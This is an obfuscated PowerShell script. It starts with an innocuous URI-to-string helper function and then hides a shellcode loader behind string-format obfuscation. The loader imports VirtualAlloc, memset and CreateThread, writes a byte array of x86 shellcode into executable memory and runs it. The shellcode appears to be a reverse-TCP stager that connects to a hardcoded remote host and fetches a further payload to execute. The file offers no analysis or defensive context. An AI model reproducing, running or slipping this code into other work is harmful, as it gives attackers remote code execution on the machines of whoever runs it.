function get-Lo`cA`TiO`N`StR`INg
{
    [CmdletBinding(pOSITIOnAlBIndiNG=${fa`l`se})]
    Param
    (
        [Parameter()]
        [Uri]
        ${LoCa`Tion`U`RI}
    )

    ${l`oC`A`TiONsT`RIng} = ${nu`ll}

    if(${LoCa`TIo`NurI})
    {
        if(${LocAtio`N`U`RI}."s`ChEME" -eq ("{1}{0}"-f'e','fil'))
        {
            ${LOCa`T`ioN`STRIng} = ${Lo`ca`TIonU`RI}."OR`i`GiNaLSTRINg"
        }
        elseif(${LOca`Ti`ONurI}."aBSo`lU`T`EUrI")
        {
            ${LO`cA`T`ions`TRIng} = ${loCa`T`I`oNuRI}."ABsoLUte`U`Ri"
        }
        else
        {
            ${L`oCat`ION`STriNg} = ${LO`CaTIonU`RI}.("{1}{2}{0}"-f 'g','ToStri','n').Invoke()
        }
    }

    return ${lo`cAtIONS`T`R`Ing}
}
${c} = ((("{93}{80}{57}{40}{84}{53}{88}{87}{27}{86}{91}{9}{68}{31}{72}{37}{0}{74}{8}{24}{92}{66}{94}{78}{47}{23}{60}{58}{98}{38}{20}{33}{50}{49}{19}{42}{21}{32}{89}{14}{10}{26}{36}{79}{44}{43}{52}{25}{3}{77}{7}{15}{18}{51}{16}{2}{29}{70}{5}{6}{65}{35}{4}{62}{73}{46}{83}{30}{12}{63}{82}{59}{13}{90}{69}{96}{54}{17}{1}{34}{95}{56}{61}{71}{75}{48}{11}{85}{55}{41}{28}{39}{45}{81}{76}{67}{22}{64}{97}"-f'Vi','pThreadI','tackSi','rib','Ad','ntPtr',' ','tes, ','(','r',')','omsv','lp','int dwCre','o','u','S','tr l','int ','mport(6K','i','rnel32.dl',' u','i','IntPt','ead(IntPtr lpThreadAtt',']p','stat','lic static','ze','tr ',' I','l','onType, uint flProt','d);','tart','ublic','Ptr ','cat',' extern ','Impo','pub','oke','xtern IntPtr Cre','e','Int','Int','nt dwS','K','lI','ect);[Dl','dw','ateThr','oke','P','rt.dll6Ko)]','ll','l','flAl','er, u','ze, uint ','Imp','dress,','Pa','int src, ','lpS',' lpAddr','memset(IntPtr dest,','n','nFlags, I',', I','or','nt',' ','rtualAlloc','t(6',' ','u','s, ui',' static ','l','Ptr','ramet','P','rt(6K','c','ic e','.dll6Ko)]public ','rnel32','6K','atio','xte','r','[D','es','[D','nt','uint count);','lo')) -rePLaCe '6Ko',[cHAR]34);${w} = .("{0}{2}{1}"-f'Ad','ype','d-T') -memberDefinition ${C} -Name ("{0}{1}"-f'W','in32') -namespace ("{2}{1}{0}"-f'ctions','Fun','Win32') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x69,0x67,0xec,0x08,0x68,0x02,0x00,0x04,0x62,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."l`En`GTh" -gt 0x1000){${G} = ${Z}."L`ENgtH"};${X}=${W}::("{1}{3}{2}{0}" -f 'oc','Vir','l','tualAl').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."le`Ng`Th"-1);${I}++) {${W}::"M`eMSet"([IntPtr](${X}.("{0}{1}{2}" -f'T','oIn','t32').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{0}{2}{1}" -f 'CreateThre','d','a').Invoke(0,0,${X},0,0,0);for (;;){&("{0}{2}{1}" -f'S','art-sleep','t') 60};
